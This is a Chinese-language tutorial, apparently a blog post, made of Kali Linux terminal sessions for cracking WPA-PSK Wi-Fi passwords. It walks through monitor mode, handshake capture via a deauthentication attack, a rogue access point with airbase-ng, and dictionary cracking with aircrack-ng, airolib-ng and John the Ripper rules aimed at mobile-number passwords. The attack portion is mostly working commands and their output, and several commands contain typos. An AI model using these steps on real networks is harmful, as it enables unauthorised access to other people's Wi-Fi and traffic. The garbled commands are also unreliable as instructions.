WPA攻击

WPA PSK攻击                    

   只有一种密码破解方法           

       WPA不存在WEP的弱点         

   只能暴力破解                   

       CPU资源                    

       时间                       

       字典质量                   

           网上共享的字典         

           泄露密码               

           地区电话号码段         

           Crunch生成字典         

           kali中自带的字典文件

WPA PSK攻击                                 

    PSK破解过程                                 

        启动monitor                             

        开始抓包并保存                          

        Deauthentication攻击获取4步握手信息    

        使用字典暴力破解

root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill
Killing these processes:

  FID NAME
  989 wpa_supplicant
 1025 dhclient

root@kali:~# airmon-ng start wlan0
NO interfering processes found

PHY     Interface       Driver            Chipest

phy0    wlan2           ath9k_htc        Atheros Communications, Inc, AR9271 802.11n
                (mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
                (mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# iwconfig
eth0      no wireless extensions

wlan0mon  IEEE 802.11bgn  Mode:Monitor Frequency:2.57 GHz   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off    Fragment thr:off
          Power Management:off

lo        no wireless extensions.

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --bssid EC:25:CA:DC:29:B6 -c 11 -w wpa

root@kali:~# airoplay-ng -0 2 -a EC:25:CA:DC:29:B6 -c 50:3E:34:30:0F:AA wlan0mon

root@kali:~# ls
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml

root@kali:~# ls wpa*
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml

root@kali:~# cd /usr/share/john/   字典目录

root@kali:/usr/share/john# ls password.list

root@kali:/usr/share/john# more password.list

root@kali:/usr/share/john# grep Password password.list
Password

root@kali:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap
密码是Password

root@kali:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/    general/    Injections/    others/    stress/    vulns/    webservicces/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-playloads/      dbcs/        web-backdoors/        wordlists-user-passwd/
Discovery/             regex/       wordlists-misc/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/         wordlists-user-passwd/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt  us_cities.txt  wordlist-alpharumeric-case.txt  wordlist-common-snmp-community-strings.txt wordlist-dns.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls
john.txt    phpbb.txt    twltter.txt woksauce.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:~# cd /usr/share/

root@kali:/usr/share# ls

root@kali:/usr/share# cd wordlists/

root@kali:/usr/share/wordlists# ls
dirb    dirbuster    dnsmap.txt    Fasttrack.txt    fern-wifi    metasploit   metasploit-jtr    namp.lst   rockyou.txt.gz    sqlmap.txt    termineter.txt wfuzz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r--r-- 1 root root 53357341 3月    3  2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r--r-- 1 root root 51M 3月    3  2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls
dirb   dirbuster   dnsmap.txt    fasttrack.txt   fern-wifi    metasploit    metasploit-jtr    nmap.lst   rockyou.txt    sqlmap.txt    terminter.txt    wfuzz

root@kali:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392

root@kali:/usr/share/wordlists#
aircrack-ng -w rockyou.txt /root/wpa-01.cap
密码是password

root@kali:~# airodump-ng --essid kifi wlan0mon

root@kali:~# airodump-ng --bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa

root@kali:~# ls
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml    wpa-02.cap   wpa-02.csv    wap-02.kismet.csv    wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

root@kali:~# grep Password135 /usr/share/wordlists/rockyou.txt

     WPA PSK攻击                                  

     AP情况下的WPA密码破解                      

         启动monitor                              

         开始抓包并保存                           

         根据probe信息伪造相同ESSIDAP           

         抓取四步握手中的前两个包                 

         使用字典暴力破解     

root@kali:~# airodump-ng wlan0mon

root@kali:~# rm wpa-01.*

root@kali:~# airodump-ng wlan0man

root@kali:~# airbase-ng -h
sage: airbase-ng <options> <replay interface>

Options

    -a bssid : set Access Point MAC address
    -i iface : capture packets from this interface
    -w WEP key : use this WEP key to encrypt/decrypt packets
    -h MAC : source mac for MITM mode
    -f disallow : disallow specified client MACs (default: allow)
    -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
    -q : quiet (do not print statistics)
    -v : verbose (print more messages) (long --verbose)
    -M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
    -A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc)
    -Y in|out|both : external packet processing
    -c channel : sets the channel the AP is running on
    -X : hidden ESSID (long --hidden)
    -s : force shared key authentication
    -S : set shared key challenge length (default: 128)
    -L : Caffe-Latte attack (long --caffe-latte)
    -N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)
    -x nbpps : number of packets per second (default: 100)
    -y : disables responses to broadcast probes
    -0 : set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type : same as -z, but for WPA2
    -V type : fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix : write all sent and received frames into pcap file
    -P : respond to all probes, even when specifying ESSIDs
    -I interval : sets the beacon interval value in ms
    -C seconds : enables beaconing of probed ESSID values (requires -P)

Filter options:

    --bssid <MAC> : BSSID to filter/use (short -b)
    --bssids <file> : read a list of BSSIDs out of that file (short -B)
    --client <MAC> : MAC of client to accept (short -d)
    --clients <file> : read a list of MACs out of that file (short -D)
    --essid <ESSID> : specify a single ESSID (short -e)
    --essids <file> : read a list of ESSIDs out of that file (short -E)

Help:

    --help: Displays the usage screen (short -H)

root@kali:~# airbase-ng --essid lcon -c 11 wlan0mon    //伪装AP
18:44:04  Created tap interface at0
18:44:04  Trying to set MTU on at0 to 1500
18:44:04  Trying to set MTU on wlan0mon to 1800
18:44:04  Access point with DSSID C8:3A:35:CA:46:91 started.

root@kali:~# tnux    //分屏

root@kali:~# airbase --essid kifi -c 11 wlan0mon

root@kali:~# airbase --essid kifi -c 11 -z 2 wlan0mon

root@kali:~# airbase --essid kifi -c 11 -Z 4 wlan0mon

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --essid kifi

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa -c 11

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml    wpa-02.cap   wpa-02.csv    wap-02.kismet.csv    wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

      AIROLIB破解密码                                               

      设计用于存储ESSID和密码列表                                   

          计算生成不变的PMK(计算资源消耗型)                       

          PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)      

          通过完整性摘要值破解密码                                  

          SQLlite3数据库存储数据

       AIROLIB破解密码                                

       echo kifi > essid.txt                          

       airolib-ng db --import essid essid.txt         

       airolib-ng db --stats                          

       airolib-ng db --import passwd <wordlist>       

           自动剔除不合格的WPA字典                    

       airolib-ng db --batch                          

           生成PMK                                    

       aircrack-ng -r db wpa.cap                      

root@kali:~# echo kifi > essid.txt

root@kali:~# cat essid.txt
kifi

root@kali:~# airolib-ng db --import essid essid.txt

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID   Priority    Done
kifi    64      (null)

root@kali:~# airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt

root@kali:~# airolib-ng db --import passwd /usr/share/john/passwrod.lst

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID   Priority    Done
kifi    64      0.0

root@kali:~# airolib-ng --batch
Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

    #  BSSID              ESSID                     Encryption

    1  C8:3A:35:CA:46:91  kifi                      WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packetsm, please wait...

                                 Aircack-ng 1.2 rc2

root@kali:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt

root@kali:~# more dict.txt

root@kali:~# airolib-ng db --import password dict.txt
Reading file
Writing...as read,121538 invalid lines ignored.
Done

root@kali:~# airolib-ng db --batch

        JTR破解密码                                         

        John the ripper                                     

            快速的密码破解软件                              

            支持基于规则扩展密码字典                        

        很多人系统用书记号码做无线密码                      

            获取号段并利用JTR规则增加最后几位的数字        

        配置文件/etc/john/john.conf                         

            [list.Rules:Wordlist]                           

            $[0-9]$[0-9]$[0-9]

root@kali:~# gedit

root@kali:~# top    //系统的性能

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

    #  BSSID              ESSID                     Encryption

    1  C8:3A:35:CA:46:91  kifi                      WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packetsm, please wait...

                                 Aircack-ng 1.2 rc2

root@kali:~# cat yd.txt

root@kali:~# vi /etc/john/john.conf
/list.Rules:Wordlist
在最后加上密码规则
$[0-9]$[0-9]$[0-9]

         JTR破解密码                                                                      

         测试效果                                                                          

             john --wordlist=passwrod.list --rules --stdout | grep -i Password123                   

         破解调用                                                                          

             john --wroldlist=pass.list --rules --stdout | aricrack-ng -e kifi -w - wap.cap         

         北京联通手机号密码破解

root@kali:~# john --wordlist=yd.txt --rules --stdout

root@kali:~# ls yd.txt -lh
-rw-r--r-- 1 root root 561 11月 10 19:57 yd.txt

root@kali:~# john --wroldlist=yd.txt --rules --stdout | aricrack-ng -e kifi -w - wap02.cap

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值